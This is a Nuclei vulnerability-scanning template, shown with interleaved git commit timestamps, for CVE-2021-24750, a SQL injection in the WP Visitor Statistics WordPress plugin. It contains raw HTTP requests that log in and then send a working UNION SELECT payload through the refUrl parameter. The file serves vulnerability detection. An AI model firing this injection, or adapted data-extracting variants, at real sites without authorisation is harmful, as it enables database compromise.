nuclei-templates/cves/2021/CVE-2021-24750.yaml

45 lines
1.5 KiB
YAML
Raw Normal View History

2022-01-23 05:17:20 +00:00
id: CVE-2021-24750
info:
name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI
author: cckuakilong
severity: high
description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which
could allow users with a role as low as subscriber to perform SQL injection attacks.
2022-01-23 05:17:20 +00:00
reference:
- https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
2022-01-23 09:08:12 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24750
2022-01-23 05:17:20 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-24750
cwe-id: CWE-89
2022-01-23 09:21:25 +00:00
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated
2022-01-23 05:17:20 +00:00
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
2022-01-23 09:21:25 +00:00
Origin: {{RootURL}}
2022-01-23 05:17:20 +00:00
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
2022-01-23 09:21:25 +00:00
GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1
2022-01-23 05:17:20 +00:00
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-01-23 09:21:25 +00:00
- "266f89556d2b38ff067b580fb305c522"
2022-01-23 05:17:20 +00:00
- type: status
status:
2022-01-23 09:08:12 +00:00
- 200